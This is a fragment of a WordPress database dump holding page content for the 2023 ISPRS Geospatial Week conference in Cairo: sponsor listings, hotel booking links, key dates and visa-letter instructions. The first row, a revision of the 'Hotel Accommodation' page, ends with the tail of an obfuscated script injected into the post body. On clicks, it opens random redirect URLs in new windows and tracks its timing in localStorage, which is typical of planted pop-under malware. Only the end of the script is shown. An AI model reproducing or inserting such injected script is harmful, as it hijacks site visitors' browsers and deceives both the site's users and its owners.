_0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Hotel Accommodation','','inherit','closed','closed','','2685-revision-v1','','','2023-07-10 01:26:19','2023-07-10 01:26:19','',2685,'https://gsw2023.com/?p=5001',0,'revision','',0),
(5002,1,'2023-07-11 13:04:18','2023-07-11 13:04:18','','logo','','inherit','open','closed','','logo','','','2023-07-11 13:04:18','2023-07-11 13:04:18','',3066,'https://gsw2023.com/wp-content/uploads/2023/07/logo.jpg',0,'attachment','image/jpeg',0),
(5003,1,'2023-07-11 13:08:27','2023-07-11 13:08:27','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219262706{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219711400{margin-top: 90px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689080816797{margin-top: 80px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689080719428{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689080889481{margin-top: 30px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><img class=\"alignnone wp-image-5002 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/logo-300x300.jpg\" alt=\"\" width=\"180\" height=\"180\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951146401{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951344645{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 size-full\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"160\" height=\"190\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1687571540500{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687564731927{margin-top: 8px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\n<p><img class=\"alignnone size-medium wp-image-4791 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on the Prime Le Lac Du Caire</h5>\n<p><img class=\"alignnone size-medium wp-image-4793 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: 